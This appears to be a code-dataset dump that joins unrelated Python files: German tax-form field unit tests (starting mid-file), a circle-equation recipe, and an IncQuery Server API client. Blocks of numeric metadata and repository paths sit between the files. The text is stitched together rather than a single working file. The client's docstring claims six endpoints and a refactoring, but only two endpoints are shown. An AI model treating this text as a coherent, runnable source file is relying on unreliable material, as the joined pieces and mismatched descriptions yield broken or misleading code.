        submitted = ['02', '259', '67', '819']
        self.form.process(formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field.data)

    def test_if_no_data_given_and_valid_formdata_then_store_form_data_as_string(self):
        """POST request with valid formdata and no prefilled data."""
        submitted = ['02', '259', '674', '819']
        self.form.process(formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual('02259674819', self.form.idnr_field.data)

    def test_if_data_given_and_invalid_formdata_then_store_form_data_as_is(self):
        """POST request with invalid formdata wins over prefilled data."""
        submitted = ['02', '259', '67', '819']
        self.form.process(data={'idnr_field': '04452397687'},
                          formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field.data)

    def test_if_data_given_and_valid_formdata_then_store_form_data_as_string(self):
        """POST request with valid formdata wins over prefilled data."""
        submitted = ['02', '259', '674', '819']
        self.form.process(data={'idnr_field': '04452397687'},
                          formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual('02259674819', self.form.idnr_field.data)
class TestIdNrFieldValue(unittest.TestCase):
    """Checks what IdNrField._value() renders back into the widget."""

    def setUp(self):
        self.form = IdNrForm()

    def test_if_no_data_and_no_formdata_given_then_value_equals_empty_list(self):
        """GET request without prefilled data renders nothing."""
        self.form.process()
        self.assertEqual([], self.form.idnr_field._value())

    def test_if_data_given_and_no_formdata_then_value_equals_list_of_data(self):
        """GET request with prefilled data renders the split ID parts."""
        self.form.process(data={'idnr_field': '02259674819'})
        self.assertEqual(['02', '259', '674', '819'], self.form.idnr_field._value())

    def test_if_no_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with invalid formdata and no prefilled data."""
        submitted = ['02', '259', '67', '819']
        self.form.process(formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field._value())

    def test_if_no_data_given_and_valid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with valid formdata and no prefilled data."""
        submitted = ['02', '259', '674', '819']
        self.form.process(formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field._value())

    def test_if_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with invalid formdata wins over prefilled data."""
        submitted = ['02', '259', '67', '819']
        self.form.process(data={'idnr_field': '04452397687'},
                          formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field._value())

    def test_if_data_given_and_valid_formdata_then_value_equals_form_data_as_is(self):
        """POST request with valid formdata wins over prefilled data."""
        submitted = ['02', '259', '674', '819']
        self.form.process(data={'idnr_field': '04452397687'},
                          formdata=MultiDict({'idnr_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.idnr_field._value())
class DateForm(SteuerlotseBaseForm):
    """Minimal form with a single date field, used as a test fixture."""
    date_field = SteuerlotseDateField()
class TestSteuerlotseDateFieldData(unittest.TestCase):
    """Checks how SteuerlotseDateField.data is populated for GET and POST scenarios."""

    def setUp(self):
        self.form = DateForm()

    def test_if_no_data_and_no_formdata_given_then_return_none(self):
        """GET request without prefilled data leaves the field empty."""
        self.form.process()
        self.assertEqual(None, self.form.date_field.data)

    def test_if_data_given_and_no_formdata_then_store_data_as_is(self):
        """GET request with prefilled data keeps the date object."""
        stored_date = dt.date(1980, 7, 31)
        self.form.process(data={'date_field': stored_date})
        self.assertEqual(stored_date, self.form.date_field.data)

    def test_if_no_data_given_and_invalid_formdata_then_return_none(self):
        """POST request with an impossible date and no prefilled data."""
        submitted = ['77', '07', '1980']
        self.form.process(formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(None, self.form.date_field.data)

    def test_if_no_data_given_and_valid_formdata_then_store_form_data_as_string(self):
        """POST request with a valid date and no prefilled data."""
        submitted = ['31', '07', '1980']
        self.form.process(formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(dt.date(1980, 7, 31), self.form.date_field.data)

    def test_if_data_given_and_invalid_formdata_then_return_none(self):
        """POST request with an impossible date wins over prefilled data."""
        submitted = ['77', '07', '1980']
        self.form.process(data={'date_field': dt.date(1979, 9, 19)},
                          formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(None, self.form.date_field.data)

    def test_if_data_given_and_valid_formdata_then_store_form_data_as_string(self):
        """POST request with a valid date wins over prefilled data."""
        submitted = ['31', '07', '1980']
        self.form.process(data={'date_field': dt.date(1979, 9, 19)},
                          formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(dt.date(1980, 7, 31), self.form.date_field.data)
class TestSteuerlotseDateFieldValue(unittest.TestCase):
    """Checks what SteuerlotseDateField._value() renders back into the widget."""

    def setUp(self):
        self.form = DateForm()

    def test_if_no_data_and_no_formdata_given_then_value_equals_empty_list(self):
        """GET request without prefilled data renders nothing."""
        self.form.process()
        self.assertEqual([], self.form.date_field._value())

    def test_if_data_given_and_no_formdata_then_value_equals_list_of_data(self):
        """GET request with prefilled data renders the split date parts."""
        self.form.process(data={'date_field': dt.date(1979, 9, 19)})
        self.assertEqual(['19', '9', '1979'], self.form.date_field._value())

    def test_if_no_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with an impossible date and no prefilled data."""
        submitted = ['77', '07', '1980']
        self.form.process(formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.date_field._value())

    def test_if_no_data_given_and_valid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with a valid date and no prefilled data."""
        submitted = ['31', '07', '1980']
        self.form.process(formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(['31', '7', '1980'], self.form.date_field._value())

    def test_if_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
        """POST request with an impossible date wins over prefilled data."""
        submitted = ['77', '07', '1980']
        self.form.process(data={'date_field': dt.date(1979, 9, 19)},
                          formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(submitted, self.form.date_field._value())

    def test_if_data_given_and_valid_formdata_then_value_equals_form_data_as_is(self):
        """POST request with a valid date wins over prefilled data."""
        submitted = ['31', '07', '1980']
        self.form.process(data={'date_field': dt.date(1979, 9, 19)},
                          formdata=MultiDict({'date_field': submitted}))
        self.form.validate()
        self.assertEqual(['31', '7', '1980'], self.form.date_field._value())
class UnlockCodeForm(SteuerlotseBaseForm):
    """Minimal form with a single unlock-code field, used as a test fixture."""
    unlock_code = UnlockCodeField()
class TestUnlockCodeFieldValue(unittest.TestCase):
    """Checks that UnlockCodeField renders submitted values in upper case."""

    def setUp(self):
        self.form = UnlockCodeForm()

    def test_if_data_given_and_lowercase_then_value_equals_uppercase_data(self):
        """POST request with lowercase input and no prefilled data."""
        submitted = ['aaaa', '12ade', '1l2ö']
        self.form.process(formdata=MultiDict({'unlock_code': submitted}))
        self.form.validate()
        self.assertEqual(['AAAA', '12ADE', '1L2Ö'], self.form.unlock_code._value())
| 47.003968
| 117
| 0.703335
| 1,555
| 11,845
| 5.005145
| 0.067524
| 0.074007
| 0.033535
| 0.039316
| 0.904022
| 0.893743
| 0.885006
| 0.872543
| 0.870615
| 0.846075
| 0
| 0.034185
| 0.180076
| 11,845
| 251
| 118
| 47.191235
| 0.767195
| 0.12824
| 0
| 0.739645
| 0
| 0
| 0.080696
| 0
| 0
| 0
| 0
| 0
| 0.171598
| 1
| 0.201183
| false
| 0
| 0.035503
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d169d83d374a231715492e655652d6700899cbdc
| 15,193
|
py
|
Python
|
recipes/Python/576531_Circle/recipe-576531.py
|
tdiprima/code
|
61a74f5f93da087d27c70b2efe779ac6bd2a3b4f
|
[
"MIT"
] | 2,023
|
2017-07-29T09:34:46.000Z
|
2022-03-24T08:00:45.000Z
|
recipes/Python/576531_Circle/recipe-576531.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 32
|
2017-09-02T17:20:08.000Z
|
2022-02-11T17:49:37.000Z
|
recipes/Python/576531_Circle/recipe-576531.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 780
|
2017-07-28T19:23:28.000Z
|
2022-03-25T20:39:41.000Z
|
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah Mohamed Salla Allahu Aliahi Wassalam.
#Author :Fouad Teniou
#Date : 08/10/08
#Version : 2.4
""" Class of an equation of a circle of the form Ax^2 + Ay^2 + Dx + Ey + F = 0 (A !=0)
it represents a circle or a point or has no graph, depending on the radius value. And a class
of an equation for the circle of radius r and centred at point (x0,y0). """
import math
class Circle(object):
    """Equation of a circle of the form Ax^2 + Ay^2 + Dx + Ey + F = 0 (A != 0).

    Depending on the squared radius the equation represents a circle, a
    single point (r == 0, reported via AssertionError from __str__) or has
    no graph (r^2 < 0, reported via ValueError from __str__).

    The *_1 attributes (_g1, _h1, _k1, _l1, _m1, _n1) hold the same
    quantities computed as if A == 1; radius(), centre() and __str__ switch
    to them when the A property currently equals 1, so an instance whose A
    is later reset to 1 still prints the matching standard form.
    """

    def __init__(self, Avalue, Dvalue, Evalue, Fvalue):
        """Circle construction takes the A, D, E, F constants."""
        self.__A = float(Avalue)
        self.__D = float(Dvalue)
        self.__E = float(Evalue)
        self.__F = float(Fvalue)

        # Superscript-two character used when rendering the equation.
        # (The original Python 2 recipe used chr(253), the squared sign in
        # code page 437; chr(178) is the correct Unicode codepoint.)
        self._b = chr(178)
        self._a = self._checkSign(self.__A)
        self._d = self._checkSign(self.__D)
        self._e = self._checkSign(self.__E)
        self._f = self._checkSign(self.__F)
        # Centre offsets: x0 = -D/(2A), y0 = -E/(2A); *_1 assume A == 1.
        self._g = ((self.__D/self.__A)/2)
        self._g1 = self.__D/2
        self._h = ((self.__E/self.__A)/2)
        self._h1 = self.__E/2
        self._i = self._checkSign(self._g)
        self._j = self._checkSign(self._h)
        # Squared radius: r^2 = -F/A + (D/2A)^2 + (E/2A)^2.
        self._k = (-self.__F/self.__A + self._g**2 + self._h**2)
        self._k1 = (-self.__F + self._g1**2 + self._h1**2)
        self._l = "%2.2f" % math.sqrt(abs(self._k))
        self._l1 = "%2.2f" % math.sqrt(abs(self._k1))
        # Standard forms "(x+x0)^2+(y+y0)^2 = r^2" and centre strings.
        self._m = "(x%s%s)%s+(y%s%s)%s = %s" % \
                  (self._i, self._g, self._b, self._j, self._h, self._b, self._k)
        self._m1 = "(x%s%s)%s+(y%s%s)%s = %s" % \
                   (self._i, self._g1, self._b, self._j, self._h1, self._b, self._k1)
        self._n = "(%s,%s)" % (-self._g, -self._h)
        self._n1 = "(%s,%s)" % (-self._g1, -self._h1)

    def __str__(self):
        """Render the general equation, standard form, centre and radius.

        Raises:
            AssertionError: if the graph degenerates to a single point (r == 0).
            ValueError: if r^2 < 0, i.e. the equation has no graph.
        """
        try:
            math.sqrt(self._k)
            # Circle raises zero degenerate case
            assert math.sqrt(self._k) != 0, "The graph is the single point %s" % \
                Circle.centre(self)
            # NOTE: the original recipe tested `== 0` here, which is
            # inconsistent with radius()/centre() (both test `== 1`) and is
            # unreachable anyway because getA rejects A == 0.
            if self.__A == 1:
                # Coefficient 1 is conventionally omitted from the equation.
                return "\n<Equation of a circle : x%s + y%s %s %sx %s %sy %s %s = 0 \
\n\n%s %35s %25s \n\n%s %22s %24s\n" % \
                    (self._b, self._b, self._d, int(self.D), self._e,
                     int(self.E), self._f, int(self.F),
                     'Standard form', 'Centre(x0,y0)', 'Radius r',
                     self._m1, Circle.centre(self), Circle.radius(self))
            else:
                return "\n<Equation of a circle : %sx%s + %sy%s %s %sx %s %sy %s %s = 0 \
\n\n%s %35s %25s \n\n%s %22s %24s\n" % \
                    (int(self.A), self._b, int(self.A), self._b, self._d, int(self.D), self._e,
                     int(self.E), self._f, int(self.F),
                     'Standard form', 'Centre(x0,y0)', 'Radius r',
                     self._m, Circle.centre(self), Circle.radius(self))
        # Circle raises Negative number degenerate case
        except ValueError:
            raise ValueError(" r%s < 0 : Degenerate case has no graph" % self._b)

    def getA(self):
        """Get method for A attribute; A == 0 would not describe a circle."""
        if self.__A != 0:
            return self.__A
        else:
            raise ValueError(" A value should be different than zero ")

    def setA(self, value):
        """Set method for A attribute."""
        self.__A = value

    def delA(self):
        """Delete method for A attribute."""
        del self.__A

    # Create A property
    A = property(getA, setA, delA, "A constant")

    def getD(self):
        """Get method for D attribute."""
        return self.__D

    def setD(self, value):
        """Set method for D attribute."""
        self.__D = value

    def delD(self):
        """Delete method for D attribute."""
        del self.__D

    # Create D property
    D = property(getD, setD, delD, "D constant")

    def getE(self):
        """Get method for E attribute."""
        return self.__E

    def setE(self, value):
        """Set method for E attribute."""
        self.__E = value

    def delE(self):
        """Delete method for E attribute."""
        del self.__E

    # Create E property
    E = property(getE, setE, delE, "E constant")

    def getF(self):
        """Get method for F attribute."""
        return self.__F

    def setF(self, value):
        """Set method for F attribute."""
        self.__F = value

    def delF(self):
        """Delete method for F attribute."""
        del self.__F

    # Create F property
    F = property(getF, setF, delF, "F constant")

    def _checkSign(self, value):
        """Return '+' for non-negative values, '' otherwise.

        The minus sign of a negative value is produced by the value's own
        string representation when it is interpolated.
        """
        if value >= 0:
            return "+"
        else:
            return ""

    def radius(self):
        """Return the radius of the circle as a '%2.2f' string."""
        if self.__A == 1:
            return self._l1
        else:
            return self._l

    def centre(self):
        """Return the centre (x0, y0) of the circle as a string."""
        if self.__A == 1:
            return self._n1
        else:
            return self._n
class Equation(Circle):
    """Builds the two equation forms of a circle from its centre and radius."""

    def __init__(self, x, y, radius):
        """Equation construction takes the centre (x, y) and the radius."""
        self.__x = float(x)
        self.__y = float(y)
        self.__radius = float(radius)

        # Superscript-two character (code page 437) used in the rendered strings.
        self._o = chr(253)
        self._p = self.__radius**2
        self._q = self._checkSign(-self.__x)
        self._r = self._checkSign(-self.__y)
        # Standard form "(x-x0)^2 + (y-y0)^2 = r^2".
        standard_terms = (self._q, -self.__x, self._o,
                          self._r, -self.__y, self._o, self._p)
        self._s = "(x%s%s)%s + (y%s%s)%s = %s " % standard_terms
        # Constant term of the expanded general form: x0^2 + y0^2 - r^2.
        self._t = self.__x**2 + self.__y**2 - self._p
        self._u = self._checkSign(self._t)
        general_terms = (self._o, self._o, self._q, -self.__x*2,
                         self._r, -self.__y*2, self._u, self._t)
        self._v = "x%s + y%s %s %sx %s %sy %s %s = 0 " % general_terms

    def __str__(self):
        """Render radius, centre and both equation forms."""
        # Equation raises radius value < 0
        assert self.__radius > 0, "<Radius value should be greater than zero"
        template = ("\n<Equation for the circle of radius (%s)\
centred at (%s,%s) is : \n\n%s < -- > %s")
        return template % (self.__radius, self.__x, self.__y, self._s, self._v)
if __name__ == "__main__":
    # Demonstrate the general-form constructor.
    circle1 = Circle(16, 40, 16, -7)
    print(circle1)
    # radius/centre are instance methods (the original recipe wrote the
    # reversed `radius.circle1()`, which is a NameError).
    print(circle1.radius())
    print(circle1.centre())

    # Resetting A to 1 switches printing to the precomputed A == 1 form.
    circle2 = Circle(2, 24, 0, -81)
    print(circle2)
    del circle2.A
    circle2.A = 1
    print(circle2)

    # Demonstrate building the equations from centre and radius.
    equation = Equation(2, 5, 3)
    print(equation)

    # Show the docstring and accessor names of each managed property.
    for doc in (Circle.A, Circle.D, Circle.E, Circle.F):
        print(doc.__doc__, doc.fget.__name__, doc.fset.__name__, doc.fdel.__name__)
########################################################################################
#Version : Python 3.2
#import math
#class Circle(object):
# """ Class that represent an equation of a circle
# with A,D,E,F constants properties"""
#
# def __init__(self,Avalue,Dvalue,Evalue,Fvalue):
# """ Circle constructor takes A,D,F,E constants """
#
# self.__A = float(Avalue)
# self.__D = float(Dvalue)
# self.__E = float(Evalue)
# self.__F = float(Fvalue)
#
# self._b = chr(178)
# self._a = self._checkSign(self.__A)
# self._d = self._checkSign(self.__D)
# self._e = self._checkSign(self.__E)
# self._f = self._checkSign(self.__F)
# self._g = ((self.__D/self.__A)/2)
# self._g1 = self.D/2
# self._h = ((self.__E/self.__A)/2)
# self._h1 = self.E/2
# self._i = self._checkSign(self._g)
# self._j = self._checkSign(self._h)
# self._k = (-self.__F/self.__A +self._g**2 + self._h**2)
# self._k1= (-self.__F +self._g1**2 + self._h1**2)
# self._l = "%2.2f" % math.sqrt(abs(self._k))
# self._l1= "%2.2f" % math.sqrt(abs(self._k1))
# self._m = "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._i,self._g,self._b,self._j,self._h,self._b,self._k)
# self._m1 ="(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._i,self._g1,self._b,self._j,self._h1,self._b,self._k1)
# self._n = "(%s,%s)" % (-self._g,-self._h)
# self._n1= "(%s,%s)" % (-self._g1,-self._h1)
#
#
# def squared(self):
# self._w =(-self.__F/self.__A +((self.__D/self.__A)/2)**2 + ((self.__E/self.__A)/2)**2)
# return self._w
# def standardForm(self):
# return "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._checkSign(((self.__D/self.__A)/2)),((self.__D/self.__A)/2),chr(178),self._checkSign(((self.__E/self.__A)/2)),((self.__E/self.__A)/2),chr(178),(-self.__F/self.__A +((self.__D/self.__A)/2)**2 + ((self.__E/self.__A)/2)**2))
#
# def __str__(self):
# """ String representation of the circle equation,
# standard form, centre and radius"""
#
# try:
# math.sqrt(Circle.squared(self))
#
# #Circle raises zero degenerate case
# assert math.sqrt(Circle.squared(self)) != 0,"The graph is the single point %s" % \
# Circle.centre(self)
# if self.__A == 1:
#
# return "\n<Equation of a circle : x%s + y%s %s %sx %s %sy %s %s = 0 \
# \n\n%s %35s %25s \n\n%s %22s %24s\n" %\
# (self._b,self._b,self._d,int(self.D),self._e,\
# int(self.E),self._f,int(self.F),
# "Standard form","Center(x0,y0)","Radius r",\
# self._m1,Circle.centre(self),Circle.radius(self))
# else:
# return "\n<Equation of a circle : %sx%s + %sy%s %s %sx %s %sy %s %s = 0 \
# \n\n%s %35s %25s \n\n%s %22s %24s\n" %\
# (int(self.A),self._b,int(self.A),self._b,self._d,int(self.D),self._e,\
# int(self.E),self._f,int(self.F),
# "Standard form","Center(x0,y0)","Radius r",\
# Circle.standardForm(self),Circle.centre(self),Circle.radius(self))
#
# #Circle raises Negative number degenerate case
# except ValueError:
# raise ValueError("r%s < 0 : Degenerate case has no graph" % self._b)
#
# def getA(self):
# """ Get method for A attribute """
# if self.__A !=0:
# return self.__A
# else:
#            raise ValueError("A value should be different from zero")
#
# def setA(self,value):
# """ Set method for A attribute """
#
# self.__A = value
#
# def delA(self):
# """Delete method for A attrobute"""
#
# del self.__A
#
# #Create a property
# A = property(getA,setA,delA,"A constant")
#
# def getD(self):
# """ Get method for D attribute """
#
# return self.__D
#
# def setD(self,value):
# """ Set method for D attribute """
#
# self.__D = value
#
# def delD(self):
# """Delete method for D attrobute"""
# del self.__D
#
# #Create a property
# D = property(getD,setD,delD,"D constant")
# def getE(self):
# """ Get method for E attribute """
# return self.__E
#
# def setE(self,value):
# """ Set method for E attribute """
#
# self.__E = value
#
# def delE(self):
# """Delete method for E attrobute"""
#
# del self.__E
#
# #Create a property
# E = property(getE,setE,delE,"E constant")
#
# def getF(self):
# """ Get method for F attribute """
#
# return self.__F
#
# def setF(self,value):
# """ Set method for F attribute """
#
# self.__F = value
#
# def delF(self):
# """Delete method for F attrobute"""
#
# del self.__F
#
# #Create a property
# F = property(getF,setF,delF,"F constant")
#
# def _checkSign(self,value):
# """ Utility method to check the values's sign
# and return a sign string"""
#
# if value >= 0:
# return "+"
# else :
# return ""
#
# def radius(self):
# """ Computes radius of a circle """
# if self.__A ==1:
# return self._l1
# else:
# return "%2.2f" % math.sqrt(abs(Circle.squared(self)))
#
# def centre(self):
# """ Computes centre(x0,y0) of a circle """
# if self.__A == 1:
# return self._n1
# else:
# return "(%s,%s)" % (-((self.__D/self.__A)/2),-((self.__E/self.__A)/2))
#
#
#
#class Equation(Circle):
# """ class that represent a radius and the centre of a circle """
#
# def __init__(self,x,y,radius):
# """ Equation construction takes centre(xValue,yValue)
# and radius """
#
# self.__x = float(x)
# self.__y = float(y)
# self.__radius = float(radius)
#
# self._o = chr(178)
# self._p = self.__radius**2
# self._q = self._checkSign(-self.__x)
# self._r = self._checkSign(-self.__y)
# self._s = "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._q,-self.__x,self._o,self._r,-self.__y,self._o,self._p)
# self._t = self.__x**2 + self.__y**2 - self._p
# self._u = self._checkSign(self._t)
# self._v = "x%s + y%s %s%sx %s%sy %s%s = 0" % \
# (self._o,self._o,self._q,-self.__x*2,self._r,-self.__y*2,self._u,self._t)
#
# def __str__(self):
# """ String representation of the circle equation, standard form,
# centre and radius"""
#
# #Equation raises radius value < 0
# assert self.__radius > 0, "<radius value should be greater than zero"
#
# return ("\n<Equation for the circle of radius (%s)\
# centred at(%s,%s) is :\n\n%s <--> %s") %\
# (self.__radius,self.__x,self.__y,self._s,self._v )
#
#
#if __name__ == "__main__":
# circle1 = Circle(10,40,16,-7)
# print(circle1)
#
# print(circle1.radius())
# print(circle1.centre())
# circle1.delA
# circle1.A=1
# print(circle1)
# circle3 = Circle(5,24,0,-81)
# print(circle3)
#
# circle3.E =80
# print(circle3)
#
# equation = Equation(2,5,3)
# print(equation)
#
#
# for doc in (Circle.A,Circle.D,Circle.E,Circle.F):
# print(doc.__doc__,"=",doc.fget.__name__,doc.fset.__name__,doc.fdel.__name__)
#######################################################################################
#<Equation of a circle : 10x² + 10y² + 40x + 16y -7 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.0)²+(y+0.8)² = 5.34 (-2.0,-0.8) 2.31
#2.31
#(-2.0,-0.8)
#<Equation of a circle : x² + y² + 40x + 16y -7 = 0
#Standard form Center(x0,y0) Radius r
#(x+20.0)²+(y+8.0)² = 471.0 (-20.0,-8.0) 21.70
#<Equation of a circle : 5x² + 5y² + 24x + 0y -81 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.4)²+(y+0.0)² = 21.96 (-2.4,-0.0) 4.69
#<Equation of a circle : 5x² + 5y² + 24x + 80y -81 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.4)²+(y+8.0)² = 85.96 (-2.4,-8.0) 9.27
#<Equation for the circle of radius (3.0) centred at(2.0,5.0) is :
#(x-2.0)²+(y-5.0)² = 9.0 <--> x² + y² -4.0x -10.0y +20.0 = 0
#A constant = getA setA delA
#D constant = getD setD delD
#E constant = getE setE delE
#F constant = getF setF delF
| 30.26494
| 246
| 0.53992
| 2,246
| 15,193
| 3.427872
| 0.100178
| 0.014547
| 0.008183
| 0.024289
| 0.835693
| 0.817249
| 0.803871
| 0.797117
| 0.78127
| 0.78127
| 0
| 0.03589
| 0.279273
| 15,193
| 501
| 247
| 30.325349
| 0.667215
| 0.578556
| 0
| 0.145038
| 0
| 0.038168
| 0.085465
| 0
| 0
| 0
| 0
| 0
| 0.015267
| 0
| null | null | 0
| 0.007634
| null | null | 0.053435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f19873574132a123bbadc53479a8fa78004068e
| 24,533
|
py
|
Python
|
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
IncQuery Server
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 0.12.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from iqs_client.api_client import ApiClient
class QueriesApi(object):
    """Client for the IncQuery Server query-management endpoints.

    NOTE: This class is auto generated by OpenAPI Generator
    Ref: https://openapi-generator.tech
    Do not edit the class manually.

    The six endpoint pairs below followed an identical template (validate
    kwargs, check required params, build headers/query/body, delegate to
    ``api_client.call_api``), so the shared plumbing has been factored into
    the private helpers ``_sync_or_async``, ``_check_params`` and
    ``_call_endpoint``.  Every public signature, endpoint path, response
    type and error message is unchanged.
    """

    def __init__(self, api_client=None):
        # Fall back to a default-configured client when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    # ------------------------------------------------------------------
    # Shared plumbing
    # ------------------------------------------------------------------

    def _sync_or_async(self, http_info_method, *args, **kwargs):
        """Invoke *http_info_method* in data-only mode.

        With ``async_req=True`` the underlying client returns the request
        thread; otherwise (because ``_return_http_data_only`` is forced on)
        it returns the deserialized response data directly.
        """
        kwargs['_return_http_data_only'] = True
        return http_info_method(*args, **kwargs)

    def _check_params(self, method_name, local_var_params, all_params, required):
        """Validate keyword arguments and required parameters in place.

        Moves each entry of ``local_var_params['kwargs']`` up into
        ``local_var_params``.

        :param str method_name: public method name used in error messages
        :param dict local_var_params: the caller's ``locals()`` snapshot
        :param list all_params: endpoint-specific parameter names
        :param list required: subset of names that must be non-None
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: on a missing/None required parameter
        """
        accepted = list(all_params) + [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
        ]
        for key, val in local_var_params['kwargs'].items():
            if key not in accepted:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name)
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        for name in required:
            if local_var_params.get(name) is None:
                raise ValueError(
                    "Missing the required parameter `%s` when calling `%s`"
                    % (name, method_name))  # noqa: E501

    def _call_endpoint(self, resource_path, http_method, local_var_params,
                       response_type, query_param_map=(), body_param_name=None,
                       content_type=None):
        """Assemble request pieces and delegate to ``api_client.call_api``.

        :param str resource_path: endpoint path, e.g. ``'/queries.list'``
        :param str http_method: ``'GET'`` or ``'POST'``
        :param dict local_var_params: validated parameters (see _check_params)
        :param str response_type: OpenAPI model name to deserialize into
        :param query_param_map: (wire name, local name) pairs; a pair is
            emitted only when the local name was actually supplied
        :param body_param_name: local name whose value becomes the body
        :param content_type: request Content-Type, or None for no body header
        """
        query_params = []
        for wire_name, local_name in query_param_map:
            if local_name in local_var_params:
                query_params.append((wire_name, local_var_params[local_name]))

        body_params = None
        if body_param_name is not None and body_param_name in local_var_params:
            body_params = local_var_params[body_param_name]

        # HTTP header `Accept` (always JSON for these endpoints)
        header_params = {
            'Accept': self.api_client.select_header_accept(
                ['application/json']),
        }
        # HTTP header `Content-Type` only for endpoints that send a body
        if content_type is not None:
            header_params['Content-Type'] = \
                self.api_client.select_header_content_type([content_type])

        return self.api_client.call_api(
            resource_path, http_method,
            {},  # path_params: none of these endpoints use them
            query_params,
            header_params,
            body=body_params,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=['basicAuth'],
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats={})

    # ------------------------------------------------------------------
    # Public API
    # ------------------------------------------------------------------

    def get_query_details(self, query_fqn, **kwargs):  # noqa: E501
        """Retrieve detailed information for a query specification  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.get_query_details(query_fqn, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str query_fqn: Fully qualified name of the query (package name and query name separated with a dot) (required)
        :return: QuerySpecificationResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(
            self.get_query_details_with_http_info, query_fqn, **kwargs)

    def get_query_details_with_http_info(self, query_fqn, **kwargs):  # noqa: E501
        """Retrieve detailed information for a query specification  # noqa: E501

        Same contract as :meth:`get_query_details`, but returns the full
        HTTP response info unless ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('get_query_details', local_var_params,
                           all_params=['query_fqn'], required=['query_fqn'])
        return self._call_endpoint(
            '/queries.details', 'GET', local_var_params,
            response_type='QuerySpecificationResponse',
            query_param_map=[('queryFQN', 'query_fqn')])

    def list_queries(self, **kwargs):  # noqa: E501
        """List registered query specifications  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.list_queries(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: QueryListResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        return self._sync_or_async(self.list_queries_with_http_info, **kwargs)

    def list_queries_with_http_info(self, **kwargs):  # noqa: E501
        """List registered query specifications  # noqa: E501

        Same contract as :meth:`list_queries`, but returns the full
        HTTP response info unless ``_return_http_data_only`` is set.
        """
        local_var_params = locals()
        self._check_params('list_queries', local_var_params,
                           all_params=[], required=[])
        return self._call_endpoint(
            '/queries.list', 'GET', local_var_params,
            response_type='QueryListResponse')
